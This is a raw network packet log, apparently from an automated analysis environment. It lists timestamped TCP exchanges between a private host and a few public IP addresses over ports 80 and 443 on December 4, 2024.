Dec 4, 2024 12:16:06.878133059 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.878267050 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.878313065 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.879230976 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.879405022 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.879451036 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.879981041 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.880187035 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.880230904 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.881010056 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.881222963 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.881287098 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.882083893 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.882276058 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.882318974 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.883212090 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.883380890 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.883424997 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.884174109 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.884372950 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.884418964 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.885278940 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.885507107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.885555029 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.886312962 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.886571884 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.886615038 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.887444019 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.887614012 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.887656927 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.888356924 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.888578892 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.888622999 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.889426947 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.889724970 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.889772892 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.890492916 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.890696049 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.890744925 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.891551971 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.891746998 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.891805887 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.892575979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.892786980 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.892833948 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.893645048 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.893857002 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.893903017 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.894675016 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.894949913 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.894996881 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.895735979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.895960093 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.896003962 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.896775961 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.897021055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.897066116 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.897864103 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.898061991 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.898104906 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.898907900 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.899079084 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.899122000 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.900043964 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.900274038 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.900319099 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.901087046 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.901258945 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.901302099 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.902147055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.902360916 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.902421951 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.903106928 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.903321981 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.903367996 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.904159069 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.904388905 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.904437065 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.905217886 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.905405045 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.905451059 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.906243086 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.906474113 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.906519890 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.907342911 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.907535076 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.907577991 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.908369064 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.908565044 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.908611059 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.909449100 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.910022020 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.910074949 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.910499096 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.910702944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.910751104 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.911503077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.911711931 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.911761045 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.912550926 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.912863970 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.912928104 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.913678885 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.913966894 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.914012909 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.914665937 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.914880991 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.914927959 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.915827990 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.916034937 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.916080952 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.916800022 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.917035103 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.917084932 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.917900085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.918123960 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.918169975 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.919063091 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.919251919 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.919296026 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.920003891 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.920144081 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.920188904 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.921017885 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.921278954 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.921324015 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.922070026 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.922288895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.922336102 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.923077106 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.923276901 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.923342943 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.924206018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.924427032 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.924478054 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.925321102 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.965770006 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.071573973 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.071677923 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.071724892 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.071743965 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.072088003 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.072137117 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.072729111 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.072920084 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.072964907 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.073837996 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.074043036 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.074093103 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.074806929 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.075025082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.075073004 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.075891972 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.076162100 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.076210976 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.077038050 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.077245951 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.077302933 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.078053951 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.078203917 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.078249931 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.079173088 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.079335928 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.079382896 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.080307007 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.080591917 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.080638885 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.081191063 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.081480980 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.081532001 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.082603931 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.082859039 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.082926035 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.083801985 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.083941936 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.083988905 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.084897995 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.085076094 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.085120916 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.085772038 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.085949898 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.085993052 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.086585999 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.086872101 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.086920977 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.087625027 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.087810040 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.087857962 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.088535070 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.088721037 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.088766098 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.089539051 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.089787006 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.089838982 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.090748072 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.090895891 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.090949059 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.091660023 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.091911077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.091959953 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.092713118 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.092940092 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.093007088 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.093739986 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.093981028 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.094022989 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.094841003 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.095061064 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.095103979 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.095889091 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.096086979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.096139908 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.097013950 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.097234011 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.097278118 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.098104954 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.098412037 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.098457098 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.099061012 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.099212885 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.099267006 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.100025892 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.100227118 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.100265980 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.101069927 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.101336956 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.101380110 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.102158070 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.102366924 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.102416039 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.103229046 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.103415966 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.103480101 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.104239941 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.104454994 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.104501009 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.105487108 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.105726957 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.105777025 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.106486082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.106638908 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.106689930 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.107522964 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.107676029 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.107714891 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.108493090 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.108709097 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.108751059 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.109535933 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.109728098 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.109767914 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.110573053 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.110779047 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.110825062 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.111726999 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.111906052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.111944914 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.112684965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.112876892 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.112925053 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.113689899 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.155586004 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:07.276222944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:07.276304960 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:16.320337057 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:16.320375919 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:16.320508957 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:16.322459936 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:16.322470903 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:17.990259886 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:17.990437984 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:17.996701956 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:17.996721029 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:17.996985912 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:18.043905973 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:19.695955038 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:19.743325949 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.243216038 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.243237019 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.243244886 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.243253946 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.243278027 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.243329048 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:20.243345022 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.243356943 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:20.243392944 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:20.264910936 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.265008926 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:20.265014887 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.265022993 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:20.265096903 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:21.905692101 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:21.905740023 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:21.905755043 CET	49731	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:21.905761957 CET	443	49731	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:23.099172115 CET	49723	80	192.168.2.4	199.232.214.172
Dec 4, 2024 12:16:23.219414949 CET	80	49723	199.232.214.172	192.168.2.4
Dec 4, 2024 12:16:23.219741106 CET	49723	80	192.168.2.4	199.232.214.172
Dec 4, 2024 12:16:58.308149099 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:58.308209896 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:58.308283091 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:58.308758020 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:58.308773041 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:58.310853958 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:16:58.310900927 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:16:58.310996056 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:16:58.311327934 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:16:58.311343908 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:16:59.968806982 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:59.968920946 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:59.973479033 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:16:59.973496914 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:59.973737955 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:16:59.982088089 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:17:00.027328014 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.033379078 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.033473969 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.034965038 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.034976006 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.035181999 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.043081045 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.087331057 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.511109114 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.511142969 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.511157990 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.511209965 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.511256933 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.511279106 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.511302948 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.638552904 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.638600111 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.638648987 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.638680935 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:17:00.638717890 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.638756990 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:17:00.638787031 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:17:00.679135084 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.679199934 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.679224968 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.679280043 CET	49737	443	192.168.2.4	172.202.163.200
